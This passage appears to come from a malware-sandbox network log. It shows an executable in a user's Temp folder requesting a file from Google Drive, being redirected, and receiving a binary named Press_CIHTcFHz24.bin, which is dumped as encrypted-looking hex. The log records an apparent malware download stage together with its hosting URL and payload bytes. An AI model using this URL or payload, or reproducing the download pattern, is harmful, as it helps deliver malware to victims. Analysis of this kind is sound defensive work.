                      Set-Cookie: NID=511=lYH5H6l_Ll27ikXCuJAKuxQ_s-sMYs_nQlYx75FcvpLRelhWkavRXza1wfiZZ_SbspBk2xBj5NyQSe07WPoHEONxVWWKwXyRM0dc3Yfb7i4otR_2P2Qtb1zzXjdN-4q46IgePYUhPF-JUs3qzPz2BEunlbbWLbzexxERFGEn2n4; expires=Fri, 03-Jun-2022 07:33:43 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                      Accept-Ranges: none
                      Vary: Accept-Encoding
                      Connection: close
                      Transfer-Encoding: chunked
                      2021-12-02 07:33:44 UTC1INData Raw: 31 38 34 0d 0a 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 46 46 46 46 46 46 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 48 31 3e 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 64 6f 63 2d 30 73 2d 38 67 2d 64 6f 63 73 2e 67 6f 6f 67 6c 65 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 64 6f 63 73 2f 73 65 63 75 72 65 73 63 2f 68 61 30 72 6f 39 33 37 67 63 75 63 37 6c 37 64 65 66 66 6b 73 75 6c 68 67 35 68 37 6d 62 70 31 2f 65 33 71 69
                      Data Ascii: 184<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#000000"><H1>Moved Temporarily</H1>The document has moved <A HREF="https://doc-0s-8g-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/e3qi
                      2021-12-02 07:33:44 UTC2INData Raw: 30 0d 0a 0d 0a
                      Data Ascii: 0


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      1192.168.2.449808142.250.203.97443C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe
                      TimestampkBytes transferredDirectionData
                      2021-12-02 07:33:44 UTC2OUTGET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/e3qi22h3f39crtgptlkpn346psio1vva/1638430350000/13431600623523591888/*/1vel8-ekCr0ivRl8u50SHCZNZh1tCa62N?e=download HTTP/1.1
                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                      Cache-Control: no-cache
                      Host: doc-0s-8g-docs.googleusercontent.com
                      Connection: Keep-Alive
                      2021-12-02 07:33:44 UTC2INHTTP/1.1 200 OK
                      X-GUploader-UploadID: ADPycdvPZnxirqiyqNEhrL5YVY24AwGEW86LVLFTOyvbBvVnsjiGAcllvcG6sUG_MWWVGfdAK9tNRxJjtzR_FwDWoH7Os0P7Vw
                      Access-Control-Allow-Origin: *
                      Access-Control-Allow-Credentials: false
                      Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, x-chrome-connected, X-ClientDetails, X-Client-Version, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, x-goog-ext-124712974-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, X-Goog-Api-Key, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Ariane-Xsrf-Token, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-ViewerInfo, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout
                      Access-Control-Allow-Methods: GET,OPTIONS
                      Content-Type: application/octet-stream
                      Content-Disposition: attachment;filename="Press_CIHTcFHz24.bin";filename*=UTF-8''Press_CIHTcFHz24.bin
                      Content-Length: 106560
                      Date: Thu, 02 Dec 2021 07:33:44 GMT
                      Expires: Thu, 02 Dec 2021 07:33:44 GMT
                      Cache-Control: private, max-age=0
                      X-Goog-Hash: crc32c=o3pr2w==
                      Server: UploadServer
                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                      Connection: close
                      2021-12-02 07:33:44 UTC6INData Raw: 8e 09 5b bc 86 e2 14 a9 09 e9 18 25 8f fa 3a 08 43 9d 23 94 08 7b 28 f8 43 7a bc e5 5b 4c 18 76 c1 1c 68 a5 14 29 c5 e0 6a 97 0d 16 0b bd 0f d9 9f 69 39 6c de d7 a3 36 c3 38 f1 14 0a 62 9e 58 e5 1d 33 05 c1 f3 d3 0e 3b 9c 9b 29 31 88 b6 09 f5 b2 a1 62 de 3e 71 7b 39 1f 8e e5 c6 1c 5a 32 8d d1 42 b5 3d f0 27 6a 31 bb b2 86 9b 5d 62 e6 9b ee 1f bb d4 a1 9f 6a 5c ee 12 db 14 8f 76 52 64 df 7a 51 d9 75 22 aa d0 f4 0d de 23 0a ea 85 ab a3 15 1e 2e 6b 54 0e 2a 2e 8d 20 71 cd d8 67 c1 2a c0 8b 28 24 ac e5 15 a3 d9 07 b7 0c 48 5e 83 15 24 ab f2 df 7e c9 08 41 ed 3a f6 9f 87 43 dc 86 13 43 63 2f 32 95 38 38 88 5b 5a 1d 45 40 92 ce 9f bf 4e e7 03 72 2a c1 00 5a d4 3f 93 5d c2 c8 e6 7b c6 d0 ee 96 bb c3 9e 12 6f 89 88 98 f5 d9 a6 3f 4d 6e 56 7d 00 da a0 a3 e0 81 63
                      Data Ascii: [%:C#{(Cz[Lvh)ji9l68bX3;)1b>q{9Z2B='j1]bj\vRdzQu"#.kT*. qg*($H^$~A:CCc/288[ZE@Nr*Z?]{o?MnV}c
                      2021-12-02 07:33:44 UTC9INData Raw: 2b ff d2 0e a2 82 56 59 4d 50 3e 33 fb b9 03 90 b0 21 da f4 d3 80 43 ff 52 5c 4b 30 ec d9 d9 ce 7f c9 80 0c 7a d7 9c 95 7f 54 31 cd a4 6a e2 73 6c 9c 99 89 5d b7 11 07 54 61 3e c4 ba 25 06 50 c6 e2 98 4d 01 27 11 82 36 d0 bc 8f 91 a2 5b 35 1c 95 93 d0 22 41 35 07 8c 20 84 1d fb 45 af 13 0d 9f 49 b0 ac ed 15 67 e3 fe 18 ce 87 5c d5 31 df c0 f2 c5 5b 2d 4e bd 9d c1 44 d1 aa 2d 61 1b 90 66 f6 3b f4 dc da 29 9c d1 9d 86 c9 1e 60 a7 ca 0b 22 13 68 f2 dc c8 2c 05 bd fe a3 3a 61 7d ba b1 7e 1d 26 c2 72 5f 2b 94 df 6b 8d c3 13 6e 73 36 c7 12 76 0a 3d 3c 24 27 06 c2 d1 cc d8 c2 4b 3d 46 91 92 2c 12 94 19 ea f9 2b ed 71 80 f1 4a bb 69 b8 79 6b 1e 1e 48 91 1d de 8e ef b9 35 56 d7 72 e4 3a d1 77 8e 6a c5 2d f0 2d 71 90 53 48 e5 4b 7c b3 ad 62 5f de 93 76 b1 3a 6d c9
                      Data Ascii: +VYMP>3!CR\K0zT1jsl]Ta>%PM'6[5"A5 EIg\1[-ND-af;)`"h,:a}~&r_+kns6v=<$'K=F,+qJiykH5Vr:wj--qSHK|b_v:m
                      2021-12-02 07:33:44 UTC13INData Raw: 81 37 1e 0b 1d 45 e9 15 df 61 e8 5d b1 5e 41 7b 32 5e a1 f0 54 dc 7c f8 3b 86 23 18 ad 67 49 ba 31 7c 7a 32 16 c1 c2 40 5a 97 48 23 dc 97 ef 07 2e d6 01 82 8d 9e ed 24 88 b7 c1 53 5a 47 24 9d 28 3e 00 f4 ee 02 da ec 97 f3 83 c7 2e 73 ce 93 61 a2 f7 e7 e3 cc 2b ad c2 d1 17 c8 56 2c bf 3a e5 44 58 73 99 39 5a 09 90 b2 b9 c0 6d c9 aa 00 a0 ba b4 99 5a ae ca 5a e6 24 d4 0f eb f1 c5 a2 79 9e 75 69 77 fd 21 c2 76 36 9c 08 3b 09 ef ac a3 81 b7 81 9a 7a 4c b9 f5 6c 86 de 60 68 de 96 7b 07 78 91 f3 f3 78 3a 62 81 8e 53 56 0c c5 2a 3a 1e 7c 2e 9b a7 27 b8 75 80 1a d4 64 e6 34 3d 7f 1b 9b 2b b7 68 c1 ad dc b4 15 a7 57 81 77 f7 af ed 3c fe 04 85 c5 20 d9 c3 ab 9b ad 2f 3b e6 10 15 45 c9 e7 c6 ae f4 11 b2 e5 cf 53 42 99 a2 92 36 4f 09 98 f7 25 f1 fd 45 90 ec 04 b4 b6
                      Data Ascii: 7Ea]^A{2^T|;#gI1|z2@ZH#.$SZG$(>.sa+V,:DXs9ZmZZ$yuiw!v6;zLl`h{xx:bSV*:|.'ud4=+hWw< /;ESB6O%E
                      2021-12-02 07:33:44 UTC17INData Raw: fd 9c b2 fd da 8a eb 38 0d 08 ef 59 ac c9 ae 4a 37 47 07 ed 28 62 a2 38 6f 4d de b0 9f c0 72 71 17 b8 36 ce 82 48 52 ef 64 3e 49 9a bc 69 3a 9e 1e b4 91 e3 f2 b4 f2 b9 8e 6e ae 21 86 94 be 1c 47 07 28 40 2b 9f 0a 13 e6 32 78 3d 05 c4 ee 1b f6 a0 9e ec 23 69 54 ea 56 83 9a 18 b8 d9 a3 45 4d 70 73 c9 c2 e4 d2 33 80 e6 70 b5 80 6f f9 33 df 3a 91 9a 52 ca d4 60 02 cc 4b 0e e4 5e a0 65 6a 42 47 26 0b 9a 90 37 f5 5f 9e 35 44 a5 e7 fc e4 a1 cb f7 e9 e2 a0 43 73 ad ee c9 69 40 97 21 02 57 80 19 86 dd f1 4a 94 73 8b ea 77 b6 82 95 39 e4 96 87 6e 99 7c 8a e0 71 6e 3e 45 df cd 82 55 f4 b5 3d f0 d8 1f c5 ed e5 6e 5f af 9d 19 18 2a 13 ed 82 c9 4e 6d 1d 3d 78 d2 0c c5 8f ad 95 a8 c0 5f d9 31 41 66 a7 1a 81 df 16 7a 41 3d 47 10 3a ea d8 04 33 7c c0 36 55 29 10 c9 b6 60
                      Data Ascii: 8YJ7G(b8oMrq6HRd>Ii:n!G(@+2x=#iTVEMps3po3:R`K^ejBG&7_5DCsi@!WJsw9n|qn>EU=n_*Nm=x_1AfzA=G:3|6U)`
                      2021-12-02 07:33:44 UTC18INData Raw: 9c 5a 9b 5f d0 7e a2 6d d2 7f 34 d4 86 ba a0 2b de fb 26 90 6f 48 08 6e 4e ca a0 ee 71 e8 49 0b e9 84 3e d9 c3 ab b7 8c 23 b7 e5 11 66 31 f9 b7 d9 27 f7 11 b2 bc 3e 80 05 96 1b 5c c5 a7 5e 67 29 19 69 ea 38 af 00 0c 13 3c 61 5f 85 d3 e9 2c 71 99 29 f8 40 f9 5a 31 8a f5 fa 6d a6 b4 d8 34 96 8a e7 74 2d 6d 6f b7 d2 33 e3 ae 3c be 11 f2 67 24 4c 41 c2 58 a7 68 30 3a 18 97 0f 5a de 85 b6 be af 4a 2a 54 41 47 e7 b8 c9 85 7e 20 44 94 58 ae a3 3f 36 c1 03 ad cb 4c 82 94 75 89 df 86 bb 9d 8c f7 23 72 6b 39 e2 b7 4b 46 46 bc 36 c7 56 23 67 7d d6 d7 a8 1e a8 a5 93 96 59 8a 12 06 71 67 24 ed 32 2d b6 54 b1 34 c8 b7 c0 ab 73 6e 3e 23 bf 2d af e9 76 4d 98 41 30 a9 62 a1 4c fb 39 35 82 d6 45 6f e7 19 a3 ca 93 2d f9 83 89 43 5d 61 d3 71 13 f6 14 d0 13 2c bb 65 cf 57 c5
                      Data Ascii: Z_~m4+&oHnNqI>#f1'>\^g)i8<a_,q)@Z1m4t-mo3<g$LAXh0:ZJ*TAG~ DX?6Lu#rk9KFF6V#g}Yqg$2-T4sn>#-vMA0bL95Eo-C]aq,eW
                      2021-12-02 07:33:44 UTC19INData Raw: 8a 85 f9 77 3b 7c 45 9b 35 e5 19 e4 92 94 89 07 04 6f 0d 7d bd 25 4b 61 aa 99 e7 95 14 1e 96 5b aa 2f 9d eb 5a c2 72 a2 9d 6d de fe 9c 7f d8 92 60 0c d5 ab ce 9c 6d f2 ae 04 3c a8 6a 5d 1c 00 7d 8f 4f a3 f3 6d 63 66 4e bc 4f 9d 99 3f 0a 52 65 2b 1d 15 52 36 1c 5c c3 00 4a da 27 2e 7c 62 26 fe c1 22 40 de 0c bc e4 0b 1e 92 af 37 23 2d 2a 9a a7 86 06 1a a0 c9 ef d7 78 ae a6 d7 e1 6b a4 d7 4f 6b c8 a0 2d c4 5f 12 66 12 62 1e 96 0a 15 89 9e b2 78 37 01 cd 0e 15 12 ab aa 5d a3 4f 38 6b d6 99 03 37 21 ef ce dd 2b 9a 4f 6d a9 c4 60 d0 81 f1 56 06 96 fd 28 27 be 8a 13 06 db 7e 78 b7 ff d6 a9 2f 4b 9e 01 c3 77 89 1c 9c 18 59 3d 94 0e e8 c2 c6 23 57 42 61 aa 16 ab 97 0f 75 ed 19 a0 26 e8 0a 5b f2 13 6a a4 3a 66 0c e5 2f cc 07 17 4a ad 72 40 01 97 d7 82 22 54 08 26
                      Data Ascii: w;|E5o}%Ka[/Zrm`m<j]}OmcfNO?Re+R6\J'.|b&"@7#-*xkOk-_fbx7]O8k7!+Om`V('~x/KwY=#WBau&[j:f/Jr@"T&
                      2021-12-02 07:33:44 UTC21INData Raw: 76 0a 2e 25 20 89 d2 a9 23 4a 69 4a 43 a6 09 8f 39 2f fb 7e b4 5d 98 25 a4 ca d8 90 3c 07 0b 58 3d 0b c4 bb e7 43 82 c7 58 98 35 bd 04 d2 78 2d f2 c9 ec b6 83 ce 83 e5 19 40 7d 37 8f 7a 2f 52 82 73 40 d3 03 15 be be c7 da 99 12 65 94 2c 44 79 ae e1 67 2e 39 bc 1d f4 4c 79 cc cd d7 4f b7 32 f5 be de 5a 45 60 44 13 b1 ab 55 81 97 eb 69 a0 10 f1 f9 43 e4 78 6a 70 0f b3 d9 b3 c9 3d a5 5c db 03 8b e7 0c 6e 74 eb de 4b 49 e4 ba 37 38 3b f0 31 05 ad b2 11 a4 02 14 29 ff 76 ae 99 eb 10 39 0a ef ad 79 66 62 c0 b1 54 1b 64 89 91 0a 38 ef ca 02 c2 82 f3 9a 3c 05 a0 2d 2e 87 48 26 27 d5 4f 1b 7b 7b 67 32 97 12 b2 39 4e 60 1e a9 d0 7d da bb fa ab a9 13 ea ac 07 28 36 32 9f 0a 67 63 7b 02 be 7d 12 10 5e f1 f3 02 2d 27 b5 ee 83 8d 5c 67 e7 47 fa 0c 89 ce 4b a0 f5 37 e8
                      Data Ascii: v.% #JiJC9/~]%<X=CX5x-@}7z/Rs@e,Dyg.9LyO2ZE`DUiCxjp=\ntKI78;1)v9yfbTd8<-.H&'O{{g29N`}(62gc{}^-'\gGK7
                      2021-12-02 07:33:44 UTC22INData Raw: 06 4c 17 c4 f2 2b 0c 69 2d 22 b3 83 f2 0b fd 5f 04 ff 9f 37 24 a9 a5 ca ea b8 86 55 d7 a3 11 77 55 c2 e2 c6 fc 17 ab b3 38 46 ea 35 97 a2 91 18 66 3e 19 2a 77 33 cf 04 ac 98 0c 3d e9 6e 44 5c f5 71 05 17 a6 96 86 16 57 ac b7 25 07 42 a1 24 48 37 e9 d4 e6 6e 75 62 1e 5c 5a fa 1e 64 ab 8b 1b 10 39 76 31 69 ec 82 8e 50 99 49 ee f6 da 04 28 6e 73 0e 11 3d 9c a9 40 80 20 a6 4e dd 0f a2 2e 5e 8b 84 20 fb 2a bd c1 b4 cc de 7c 3d 47 e6 ef e6 05 2f 7b 4d 93 87 d4 d5 bd 5c 3d 4b ca 1a 0d d3 4e 6f c2 41 d4 cb 68 ac 0d c8 e4 cb 5e 8a e9 a3 35 cf 7e 19 a8 42 5d 37 6b 59 ce 39 be b4 9e f8 95 b7 e4 bb 40 26 60 91 21 36 3a 19 70 7d 18 cf ea c8 63 e7 1e 17 c3 9e 06 3d 95 8d 9f 36 8d 94 f0 aa b4 44 59 9a 72 3e 7d a6 ac dc 8b 06 29 f6 74 59 cc 69 b7 f6 49 60 46 d4 cf ff 65
                      Data Ascii: L+i-"_7$UwU8F5f>*w3=nD\qW%B$H7nub\Zd9v1iPI(ns=@ N.^ *|=G/{M\=KNoAh^5~B]7kY9@&`!6:p}c=6DYr>})tYiI`Fe
                      2021-12-02 07:33:44 UTC23INData Raw: 09 54 c4 bd a4 d5 0f 33 27 10 26 92 21 32 21 8e f0 96 5c d4 93 37 56 29 e6 8c b5 b2 91 eb 5c 0e d6 b5 42 9d 00 7d 94 84 6b 06 ba a8 99 09 18 3f ae c6 9d 8e a0 08 24 66 89 d5 e2 33 0c b8 8d 4b 0e c5 24 80 26 b5 02 ed 9c ff cc d8 60 01 9e d0 68 34 3e d1 c0 18 10 16 0d cc 5c 77 c8 ed 19 51 cf c9 9f dc 7a 98 e5 2a 87 65 00 07 c3 77 04 c1 cd f4 a0 83 24 dc a8 fa 5c df 60 52 62 2b 78 34 d0 b9 da 55 63 b0 91 ff c2 0d e2 06 8e b7 0f 85 f1 4a 90 cb c1 a7 ae 49 f6 25 62 a6 62 de b3 37 75 bf 5b bd e8 e6 4c 09 cd f8 d9 aa 93 c9 0f d8 39 ba 4b 5a 4c 42 a2 9d 65 5f c2 9a 4d a0 ce f7 fe 0d af 12 8d 0c 8c 7b 52 6a 4b 38 06 80 86 5f 3a 99 d4 5d d3 ee 7c 56 1c ce d0 35 e5 84 5d 6a f9 90 37 b6 14 f8 5b bc 08 b5 59 29 1e e0 a6 d3 8b 35 93 ee aa ff 7d 30 b6 28 3b bf ce 37 f9
                      Data Ascii: T3'&!2!\7V)\B}k?$f3K$&`h4>\wQz*ew$\`Rb+x4UcJI%bb7u[L9KZLBe_M{RjK8_:]|V5]j7[Y)5}0(;7
                      2021-12-02 07:33:44 UTC24INData Raw: 54 8e cc 8f 48 5d 7b fb 2f 04 9d d6 2d 38 d9 62 ce 1c cc 92 cf e9 bb 34 45 1c 99 3d c9 3b 0b 9b 29 6d 76 1d 4e 64 d3 dd f9 b5 97 51 38 2a 37 44 f1 c8 31 a1 23 b2 47 77 82 21 c1 08 23 a1 cc c4 aa 08 f6 8a ac 3c 03 f2 8a 82 e8 b8 3f cd cc cd c7 23 9a c7 6b 8d 10 b5 5e 12 d3 47 72 c2 9f 93 7b 44 3a b5 80 e9 45 1a 46 4f de 25 b6 37 43 19 24 a9 0a a3 cd bd ec 26 4d bb 56 8a 75 89 b9 cd 0a 08 52 09 c7 78 d4 21 b0 9c 4b ec 46 a8 ee ae f9 54 63 4e 45 6a df 22 c8 4d f9 54 34 5e b4 ca c0 01 e2 27 df 8f 5d d8 f1 37 4c 77 b4 b1 85 06 5e 07 67 54 26 71 be 0f c6 1c 78 0c b0 14 42 48 3a e2 23 5d 30 67 e3 c1 85 24 3c 18 a0 ec 68 51 51 e9 2a 71 26 b2 e8 2f ec 4e 24 11 d8 b6 19 7a dc f5 1c cc af 21 c4 a9 6c df c7 7e fc 4f 7b 51 99 39 a4 7e 61 cf 56 85 59 ed 59 70 bc 9f 6e
                      Data Ascii: TH]{/-8b4E=;)mvNdQ8*7D1#Gw!#<?#k^Gr{D:EFO%7C$&MVuRx!KFTcNEj"MT4^']7Lw^gT&qxBH:#]0g$<hQQ*q&/N$z!l~O{Q9~aVYYpn
                      2021-12-02 07:33:44 UTC26INData Raw: d8 e9 f5 a7 39 41 70 54 34 0e df 3e e0 44 8d 92 5f 35 02 b5 4f 18 b1 04 9a 01 3c 97 3f 2a d1 29 8c 66 f1 4c 3f 5b 84 29 e5 60 7a 70 2a 6e 5c 8f f4 8b a8 4c 3d 82 e7 7a bd c0 e4 e2 41 21 f7 a9 52 7b 6c 93 32 d1 87 2c 96 72 d1 2b 2a ce 8a 3a d2 0c d3 be 60 7f fa cf 78 36 18 1d 83 43 16 7c db 6e 58 f0 9f f6 d2 3a ab 6e d7 06 8f ed b3 0b 26 16 ec 25 49 00 bd 9c 15 31 b8 b1 f4 1e 1e 94 67 f4 79 0e e6 67 bd a0 45 41 58 f8 bc ef c3 c2 40 d0 d0 64 23 5d 81 77 ba 1b 14 56 a9 de 76 d4 2a 88 75 97 be f3 88 58 bb 54 c7 9c 7f 2d e9 50 6b 7f 52 cc 38 d1 2a 7e 82 3e ad 27 f6 04 a5 8b 0d b5 83 79 be 1d 59 f2 13 bf 88 7e f4 30 4f f2 ab 8e 2b 1d cd 6c 0d 98 00 a0 b2 a5 b5 e0 d7 ea 2f 6c 74 c5 d6 96 33 2d a3 8e 68 ee 3d b5 01 f6 2d 7d 28 f9 34 46 12 23 09 98 49 ee af d4 d6
                      Data Ascii: 9ApT4>D_5O<?*)fL?[)`zp*n\L=zA!R{l2,r+*:`x6C|nX:n&%I1gygEAX@d#]wVv*uXT-PkR8*~>'yY~0O+l/lt3-h=-}(4F#I
                      2021-12-02 07:33:44 UTC27INData Raw: e2 c7 43 3a 06 a6 e9 d3 81 67 be 44 2c 37 07 bc 05 c9 61 28 15 10 e4 58 20 cb 4a 3f b1 ba e4 cf 86 c3 97 c4 b0 4f b9 16 d0 99 65 12 ef 0b 23 68 30 d4 62 1f a3 1b de e2 72 f9 4d 1c f2 78 e0 ec bb c2 b2 dd f5 fd c3 d0 10 a6 41 51 2b e3 8c 12 cf c4 b6 4f 67 f7 b5 79 6c 3a 52 75 1f 92 8d 8a b9 d7 1c 7e 04 51 c9 74 2a ec 4b 49 03 f7 a7 f6 2d e3 62 01 01 d2 2f 7b 75 18 c1 1b 88 3b 64 e5 99 ed d2 55 81 73 db 61 30 7e 76 dd 30 e6 1b 0d 3c 54 5e 3e 05 c4 49 1b f1 ba 9e 0e 32 87 3a e0 9e 78 90 4b 0f 6d c1 18 31 be e1 c7 d3 82 0e de d4 67 e5 14 55 48 29 c1 85 1b 0c 4b df 85 a3 a0 13 fa 3a ae 9d ca e5 67 56 0e 70 b7 d5 b8 c1 fd 89 91 29 e0 11 33 95 0c d2 3c 8d 25 21 f9 e8 7a 9a 97 a6 5e a2 07 12 c2 c0 d5 a3 71 46 c3 49 86 df ee db f4 8f 61 71 a0 c3 d4 cf e4 29 d6 80
                      Data Ascii: C:gD,7a(X J?Oe#h0brMxAQ+Ogyl:Ru~Qt*KI-b/{u;dUsa0~v0<T^>I2:xKm1gUH)K:gVp)3<%!z^qFIaq)
                      2021-12-02 07:33:44 UTC28INData Raw: a6 ed 12 0e 0c 82 d5 28 b2 37 9d 1b db 7d 38 0f 59 6a 21 8a 70 8b ea 06 31 46 62 8c a9 d7 c3 e3 f3 48 fe 13 5c 9e ec a2 05 be 5f 51 da bd 5e 2f 8b 91 84 b0 76 c1 dd ba f5 20 c9 a0 73 63 01 05 b2 c0 15 41 4f cb ef 15 98 40 f2 9a 11 09 06 a3 c3 59 8b f7 a5 a3 1b b7 6c 2a 89 b1 2c 63 0c 0c f1 96 3a 25 f4 6c a1 f2 a7 2f 51 52 46 12 e7 e8 d7 1a 74 5c 6f d8 e7 b6 37 36 d8 bd fb f7 2b 0e 20 d9 6f 1b 78 e4 64 cf 3a 7c 76 47 b5 51 f8 a4 8e 5d 21 48 5d 87 47 a9 79 ac 68 f6 ad 48 22 ce 97 ae 47 5a 9f 7e bf 8f c6 b7 c1 ba 8a f6 67 8f b8 bb d2 12 f8 63 7e a0 00 cb 8d 82 43 52 48 f0 c8 68 ae ff 0a 40 30 8a 76 b3 f8 db 0f db 9c 28 c4 f6 dc 82 dc dc f6 f6 b9 67 3c d8 46 8a f5 cf 2a af 50 92 05 3b 89 dc 8f b4 09 7b 49 0e 21 f5 11 dd 38 8b 21 52 47 c3 4f f1 57 05 2b 45 32
                      Data Ascii: (7}8Yj!p1FbH\_Q^/v scAO@Yl*,c:%l/QRFt\o76+ oxd:|vGQ]!H]GyhH"GZ~gc~CRHh@0v(g<F*P;{I!8!RGOW+E2
                      2021-12-02 07:33:44 UTC29INData Raw: 97 78 b0 e5 14 fa 2b 48 36 dc 45 3d 94 c5 6d e0 0f 67 e9 e6 78 07 8f 12 9a a9 bb 5f a5 11 8d 6e ea 08 6a 70 65 6c fa d0 a1 45 c7 0f e1 11 41 8a ad 36 80 6c 0f 9a e8 1a 8b 10 a2 01 72 9a 11 c1 21 60 88 b3 70 67 93 2c 7f c3 a6 7d 91 fd a4 80 32 0b c8 34 72 b6 a8 f9 e5 fa 3c 8d 62 5f 7c a2 7b 7f f0 d8 16 4f ab 39 b5 57 b8 5c 36 0b 99 d1 8d ff f8 c1 de 2c 78 26 c8 ba 6b aa aa 8f d6 29 bb 86 e0 05 15 45 d8 4e b7 7b a5 1c ba 8a 7d 5d 95 ce 44 3f 8a d6 95 62 e6 9b bf 75 bb 82 49 95 aa a3 11 1d 6c 61 f5 89 ad 95 90 3f 2a 5d 3e 5e e7 a7 a4 74 98 ee 2b e8 12 b7 d8 dd 5d a1 fb cc ff 8f 67 fb c6 d0 d7 9b e0 88 ca 5d 11 83 d3 fd 74 ca 35 ee ac 7e 63 e4 81 11 41 8f c1 59 a2 8c 3c d3 7a 2e 35 73 f7 78 bc ef 78 ab 8e 39 dc 7a 63 3b 71 c3 35 3a a1 93 12 ec 91 8f 42 38 b4
                      Data Ascii: x+H6E=mgx_njpelEA6lr!`pg,}24r<b_|{O9W\6,x&k)EN{}]D?buIla?*]>^t+]g]t5~cAY<z.5sxx9zc;q5:B8
                      2021-12-02 07:33:44 UTC31INData Raw: 93 ee 61 44 d4 f1 b8 f1 f7 94 c8 ee 12 c0 be 44 72 0c 34 a7 f6 3f a1 6c 49 23 b5 91 8e 71 84 22 7e 72 c9 ff d8 bf 3d b6 a9 07 e4 7d 1d ba a8 5e ce 2a f4 df 6d 55 94 ed b0 59 39 91 6c 5d 42 93 f2 28 a8 e7 3e df 52 68 c1 e3 9e 66 0a 6e 75 46 2b 01 0f a3 eb a8 ec 26 a6 5b 11 95 28 1c 13 96 b5 0d 8e 2f 6c af 22 88 1f a0 0a d2 32 af df 17 55 60 67 2b 7a 51 a0 ff 6a ec 2e 1c 18 8a 15 bc a7 89 aa f2 0b 2b 27 9b 41 37 4c 7e b4 58 f9 13 5e f8 3e 3c 50 14 3e f0 d9 41 e6 9a 6e 73 25 86 3b 2d d5 97 45 ec 58 5a 9d ab 0a 41 8d 91 61 3d 9a 61 17 0b eb 76 d2 e0 99 51 85 1e 4c 9d 1d c8 ec 12 13 5c 3c 86 f5 84 5f 71 d0 b9 d8 33 40 d6 c8 55 b9 05 54 e9 8a 25 d0 b3 2d de 29 60 aa d4 a1 e1 47 73 e5 24 b7 dd 36 00 d9 39 e6 74 0b e1 af 33 67 da f3 4c 84 ab 78 48 3d cb ae d6 